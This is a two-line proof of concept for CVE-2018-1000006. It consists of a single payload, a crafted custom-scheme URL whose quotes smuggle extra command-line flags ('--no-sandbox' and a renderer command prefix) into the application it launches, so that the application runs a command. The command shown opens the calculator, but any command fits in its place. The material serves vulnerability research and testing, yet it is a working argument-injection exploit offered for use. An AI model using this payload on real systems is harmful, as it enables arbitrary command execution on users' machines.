POC for CVE-2018-1000006
payload: chybeta://?" "--no-sandbox" "--renderer-cmd-prefix=cmd.exe /c start calc